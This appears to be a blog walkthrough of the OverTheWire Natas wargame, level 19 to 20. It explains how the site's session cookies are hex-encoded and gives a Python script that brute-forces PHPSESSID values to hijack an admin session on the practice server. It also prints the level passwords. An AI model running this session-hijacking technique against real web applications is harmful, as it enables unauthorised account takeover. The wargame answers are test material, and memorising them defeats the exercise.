Natas · OverTheWire

Natas Level 19 → Level 20

Level 19

Username : natas19
Password :4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs
URL : http://natas19.natas.labs.overthewire.org

Solution

To solve this level, we first log into the natas19 application using the credentials provided above.

Let’s try a few combinations of credentials.

Username/Password        Cookie Value
admin/1234               3333332d61646d696e
admi/1234                3135372d61646d69
adm/1234                 3332372d61646d
ad/1234                  3130392d6164
a/1234                   3431332d61

As we can see from the above pairs of credentials and cookie values, we can see that the password length depends on the length and the character of the username. The last 10 characters of the cookie value are ASCII values of usernames (a – 61, d – 64, m – 6d, i – 69, n – 6e). The character right before the usernames ASCII value is the ASCII value for. The characters before the 2D symbol seem to be the ASCII values for numbers (1 – 30 and 9 – 39). The application prints ‘ This page uses mostly the same code as the previous level, but session IDs are no longer sequential… ‘. The numbers might reach a maximum value of 650 like the last level. If that holds true for this time, we will have to make a limited number of attempts to find the cookie which holds session[‘admin’] set as 1.

import urllib2
targetURL='http://natas19.natas.labs.overthewire.org/'
REQ=urllib2.Request(targetURL, headers={"Authorization" : "Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw=="})
debug=0
passString = "You are an admin."
try:
    contents = urllib2.urlopen(REQ).read()
    if debug:
        print contents
except urllib2.HTTPError as e:
    print e.code
    print e.read()

def findPassword():
    global targetURL
    for i in range(641):
        REQ=urllib2.Request(targetURL, headers={"Authorization" : "Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw==", "Cookie" : "PHPSESSID="+(str(i)+"-admin").encode("hex")})
        contents = urllib2.urlopen(REQ).read() 
        if debug: 
            print "Attempted Cookie value : " + "PHPSESSID = "+(str(i)+"-admin").encode("hex")
        if contents.find(passString)!=-1:
            print contents
            break

findPassword()

By using the above code which tries various combination of ASCII encoded cookie strings containing ‘-admin’, we can find out the password for the next level.

 

Level 20

Username : natas20
Password : eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF
URL : http://natas20.natas.labs.overthewire.org

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s